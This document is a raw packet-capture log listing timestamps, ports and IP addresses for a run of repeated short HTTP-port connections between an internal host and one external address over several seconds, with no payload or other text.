Feb 7, 2023 20:03:26.129889965 CET	50265	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.133748055 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.191612959 CET	80	50265	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.193399906 CET	50265	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.196341991 CET	80	50266	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.196485043 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.196924925 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.259737968 CET	80	50266	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.263787031 CET	80	50266	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.265616894 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.373786926 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.374618053 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.435067892 CET	80	50267	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.435328960 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.436383963 CET	80	50266	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.436547995 CET	50266	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.438066959 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.498578072 CET	80	50267	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.500848055 CET	80	50267	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.501000881 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.610171080 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.611516953 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.670824051 CET	80	50267	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.672982931 CET	50267	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.673199892 CET	80	50268	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.676999092 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.680608034 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.742384911 CET	80	50268	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.744736910 CET	80	50268	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.744981050 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.867923021 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.869019032 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.931633949 CET	80	50269	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.931802034 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.932435036 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.932749033 CET	80	50268	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.932924986 CET	50268	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:26.993021011 CET	80	50269	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.995754957 CET	80	50269	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:26.997498035 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.108411074 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.109574080 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.169533014 CET	80	50269	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.169672012 CET	50269	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.170041084 CET	80	50270	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.171619892 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.172190905 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.232709885 CET	80	50270	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.237406015 CET	80	50270	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.237561941 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.358411074 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.359610081 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.420592070 CET	80	50270	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.420872927 CET	50270	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.421571016 CET	80	50271	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.421761036 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.422593117 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.483213902 CET	80	50271	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.485740900 CET	80	50271	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.485841990 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.593170881 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.594326019 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.653913021 CET	80	50271	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.654180050 CET	50271	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.655076027 CET	80	50272	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.655257940 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.657285929 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.718132019 CET	80	50272	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.720596075 CET	80	50272	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.720829964 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.826931953 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.827891111 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.888144016 CET	80	50272	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.888322115 CET	50272	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.890539885 CET	80	50273	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.890748978 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.900257111 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:27.963382006 CET	80	50273	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.968347073 CET	80	50273	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:27.968594074 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.077732086 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.078598022 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.141093016 CET	80	50274	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.141139030 CET	80	50273	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.141397953 CET	50273	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.141401052 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.142137051 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.204549074 CET	80	50274	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.208792925 CET	80	50274	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.208960056 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.327249050 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.329360008 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.389863968 CET	80	50274	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.390086889 CET	50274	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.390899897 CET	80	50275	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.391060114 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.403496027 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.465519905 CET	80	50275	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.467736006 CET	80	50275	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.467935085 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.577869892 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.578921080 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.639426947 CET	80	50275	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.639620066 CET	50275	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.641450882 CET	80	50276	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.641628027 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.648273945 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.710891962 CET	80	50276	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.713113070 CET	80	50276	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.713304996 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.828192949 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.829035044 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.891123056 CET	80	50276	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.891231060 CET	50276	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.891350031 CET	80	50277	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.891448021 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.892621040 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:28.955128908 CET	80	50277	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.957741976 CET	80	50277	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:28.957817078 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.080749989 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.081614017 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.143385887 CET	80	50277	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.143543959 CET	50277	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.143968105 CET	80	50278	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.144089937 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.144512892 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.206964016 CET	80	50278	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.212220907 CET	80	50278	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.212367058 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.327040911 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.327986002 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.390130997 CET	80	50279	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.390312910 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.390955925 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.391015053 CET	80	50278	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.391109943 CET	50278	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.453526974 CET	80	50279	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.456379890 CET	80	50279	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.456533909 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.567286015 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.568233013 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.630247116 CET	80	50279	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.630422115 CET	50279	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.632433891 CET	80	50280	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.632596970 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.633131027 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.695715904 CET	80	50280	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.698019981 CET	80	50280	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.698168993 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.816437960 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.817574978 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.879303932 CET	80	50280	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.879472017 CET	50280	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.879995108 CET	80	50281	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.880132914 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.880685091 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:29.943115950 CET	80	50281	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.945671082 CET	80	50281	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:29.947139025 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.068608999 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.069448948 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.131179094 CET	80	50282	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.131448984 CET	80	50281	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.131455898 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.131544113 CET	50281	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.132021904 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.193620920 CET	80	50282	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.197393894 CET	80	50282	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.197663069 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.313162088 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.314327002 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.374809027 CET	80	50282	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.375017881 CET	50282	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.375673056 CET	80	50283	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.375803947 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.376799107 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.438246012 CET	80	50283	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.440956116 CET	80	50283	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.441052914 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.551803112 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.554718971 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.613369942 CET	80	50283	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.615502119 CET	50283	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.615534067 CET	80	50284	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.615685940 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.624650955 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.686382055 CET	80	50284	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.689337015 CET	80	50284	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.693512917 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.796847105 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.797964096 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.857875109 CET	80	50284	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.858105898 CET	50284	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.858287096 CET	80	50285	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.858473063 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.859757900 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:30.920243025 CET	80	50285	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.922893047 CET	80	50285	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:30.923162937 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.032105923 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.032963037 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.094536066 CET	80	50286	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.094573975 CET	80	50285	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.094832897 CET	50285	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.095391989 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.095392942 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.156559944 CET	80	50286	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.160752058 CET	80	50286	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.165399075 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.279725075 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.280787945 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.339684963 CET	80	50286	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.339904070 CET	50286	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.341325045 CET	80	50287	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.341531992 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.342736959 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.403250933 CET	80	50287	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.406748056 CET	80	50287	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.406935930 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.514054060 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.515002966 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.574737072 CET	80	50287	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.574846983 CET	50287	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.576642990 CET	80	50288	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.576795101 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.578001022 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.639568090 CET	80	50288	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.641931057 CET	80	50288	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.642119884 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.749732018 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.750893116 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.811659098 CET	80	50288	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.811939955 CET	50288	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.812551022 CET	80	50289	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.812685013 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.813234091 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.874836922 CET	80	50289	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.878911972 CET	80	50289	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:31.879122972 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.983350992 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:31.984359980 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.044533014 CET	80	50290	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.044764996 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.045902014 CET	80	50289	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.046034098 CET	50289	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.058144093 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.120970964 CET	80	50290	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.123802900 CET	80	50290	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.123956919 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.238240004 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.239257097 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.298616886 CET	80	50290	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.298715115 CET	50290	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.299587011 CET	80	50291	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.299690008 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.300203085 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.360491037 CET	80	50291	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.363375902 CET	80	50291	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.363531113 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.496870995 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.498001099 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.557465076 CET	80	50291	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.557543039 CET	50291	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.558350086 CET	80	50292	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.558464050 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.559191942 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.619683981 CET	80	50292	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.622472048 CET	80	50292	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.622570038 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.737622976 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.738866091 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.798284054 CET	80	50292	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.798470974 CET	50292	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.798527002 CET	80	50293	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.798670053 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.801080942 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:32.860737085 CET	80	50293	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.864428043 CET	80	50293	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:32.864568949 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.032526970 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.033807039 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.092200994 CET	80	50293	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.092310905 CET	50293	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.095365047 CET	80	50294	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.095505953 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.100244999 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.161931992 CET	80	50294	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.166033983 CET	80	50294	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.166143894 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.286144018 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.286822081 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.347769976 CET	80	50294	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.348273993 CET	80	50295	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.348393917 CET	50294	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.348536015 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.354557991 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.416157961 CET	80	50295	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.419173002 CET	80	50295	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.419861078 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.531783104 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.532809973 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.593513966 CET	80	50295	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.594283104 CET	50295	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.594428062 CET	80	50296	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.594585896 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.595122099 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.656575918 CET	80	50296	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.658972025 CET	80	50296	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.659179926 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.765506983 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.766799927 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.827075958 CET	80	50296	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.827542067 CET	50296	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.829037905 CET	80	50297	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.829189062 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.829767942 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:33.891994953 CET	80	50297	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.894370079 CET	80	50297	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:33.894625902 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.002706051 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.004245043 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.065068007 CET	80	50297	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.065301895 CET	50297	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.066489935 CET	80	50298	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.066679001 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.067173958 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.129400969 CET	80	50298	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.133635044 CET	80	50298	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.135576963 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.253990889 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.255064011 CET	50299	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.315572977 CET	80	50299	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.315836906 CET	50299	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.316185951 CET	80	50298	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.316301107 CET	50298	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.321474075 CET	50299	80	192.168.2.6	62.204.41.4
Feb 7, 2023 20:03:34.382097960 CET	80	50299	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.386110067 CET	80	50299	62.204.41.4	192.168.2.6
Feb 7, 2023 20:03:34.386348009 CET	50299	80	192.168.2.6	62.204.41.4
